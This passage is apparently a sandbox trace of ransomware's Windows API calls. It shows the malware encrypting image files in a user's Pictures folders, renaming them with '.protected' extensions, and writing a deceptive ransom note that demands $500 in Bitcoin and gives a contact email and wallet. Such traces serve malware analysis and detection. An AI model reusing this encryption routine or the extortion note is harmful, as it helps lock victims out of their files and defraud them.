dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.538] StrStrW (lpFirst="FgnlkCw.png", lpSrch=".txt") returned 0x0 [0092.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.538] StrStrW (lpFirst="FgnlkCw.png", lpSrch=".rar") returned 0x0 [0092.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.538] StrStrW (lpFirst="FgnlkCw.png", lpSrch=".zip") returned 0x0 [0092.538] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.538] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.538] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.539] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.539] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.539] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.539] CloseHandle (hObject=0xd4) returned 1 [0092.540] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png.protected") returned 69 [0092.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\fgnlkcw.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\fgnlkcw.png.protected")) returned 1 [0092.540] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.540] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="$Recycle.bin") returned 1 [0092.541] lstrcmpiW (lpString1="J1rYsPQmwZe1", lpString2="System Volume Information") returned -1 [0092.541] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1") returned 60 [0092.541] lstrcmpW (lpString1="J1rYsPQmwZe1", lpString2=".") returned 1 [0092.541] lstrcmpW (lpString1="J1rYsPQmwZe1", lpString2="..") returned 1 [0092.541] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\*") returned 62 [0092.541] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.541] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.541] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.541] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\.") returned 62 [0092.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.541] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.541] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.541] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.541] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\..") returned 63 [0092.541] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.541] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.541] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="Windows") returned -1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="Program Files") returned -1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="Program Files (x86)") returned -1 [0092.541] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="$Recycle.bin") returned 1 [0092.542] lstrcmpiW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="System Volume Information") returned -1 [0092.542] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 
[0092.542] StrStrIW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".protected") returned 0x0 [0092.542] lstrcmpW (lpString1="7P_aUAoJtXTorv.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\7p_auaojtxtorv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 [0092.542] StrStrW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".txt") returned 0x0 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 [0092.542] StrStrW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".rar") returned 0x0 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp") returned 79 [0092.542] StrStrW (lpFirst="7P_aUAoJtXTorv.bmp", lpSrch=".zip") returned 0x0 [0092.542] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.543] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.543] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.543] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.543] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.543] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.544] CloseHandle (hObject=0xd8) returned 1 [0092.544] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp.protected") returned 89 [0092.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\7p_auaojtxtorv.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\7P_aUAoJtXTorv.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\7p_auaojtxtorv.bmp.protected")) returned 1 [0092.545] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.545] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.545] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\RESTORE_FILES.txt") returned 78 [0092.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\J1rYsPQmwZe1\\RESTORE_FILES.txt" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\j1ryspqmwze1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.546] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.546] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.547] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.547] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.547] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.547] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.547] CloseHandle (hObject=0xd4) returned 1 [0092.547] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="Windows") returned -1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="Program Files") returned -1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="Program Files (x86)") returned -1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="$Recycle.bin") returned 1 [0092.547] lstrcmpiW (lpString1="mcdRZy3ZI.png", lpString2="System 
Volume Information") returned -1 [0092.547] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.547] StrStrIW (lpFirst="mcdRZy3ZI.png", lpSrch=".protected") returned 0x0 [0092.547] lstrcmpW (lpString1="mcdRZy3ZI.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.547] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.547] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\mcdrzy3zi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.548] StrStrW (lpFirst="mcdRZy3ZI.png", lpSrch=".txt") returned 0x0 [0092.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.548] StrStrW (lpFirst="mcdRZy3ZI.png", lpSrch=".rar") returned 0x0 [0092.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png") returned 61 [0092.548] StrStrW (lpFirst="mcdRZy3ZI.png", lpSrch=".zip") returned 0x0 [0092.548] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.549] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 
1 [0092.549] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.549] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.549] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.549] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.549] CloseHandle (hObject=0xd4) returned 1 [0092.550] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png.protected") returned 71 [0092.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\mcdrzy3zi.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\mcdRZy3ZI.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\mcdrzy3zi.png.protected")) returned 1 [0092.551] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="Windows") returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="Program Files") returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="Program Files (x86)") returned 1 [0092.551] lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="$Recycle.bin") returned 1 [0092.551] 
lstrcmpiW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="System Volume Information") returned 1 [0092.551] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrIW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".protected") returned 0x0 [0092.551] lstrcmpW (lpString1="xmlrLF1ziUq2QqA Pzqs.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\xmlrlf1ziuq2qqa pzqs.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".txt") returned 0x0 [0092.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".rar") returned 0x0 [0092.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif") returned 72 [0092.551] StrStrW (lpFirst="xmlrLF1ziUq2QqA Pzqs.gif", lpSrch=".zip") returned 0x0 [0092.551] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x7cb, 
lpOverlapped=0x0) returned 1 [0092.552] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffff835, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.552] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7cb, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x7cb, lpOverlapped=0x0) returned 1 [0092.552] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.553] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.553] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.553] CloseHandle (hObject=0xd4) returned 1 [0092.553] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif.protected") returned 82 [0092.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\xmlrlf1ziuq2qqa pzqs.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\xmlrLF1ziUq2QqA Pzqs.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\xmlrlf1ziuq2qqa pzqs.gif.protected")) returned 1 [0092.554] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.554] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.554] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\RESTORE_FILES.txt") returned 65 [0092.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.555] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.555] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
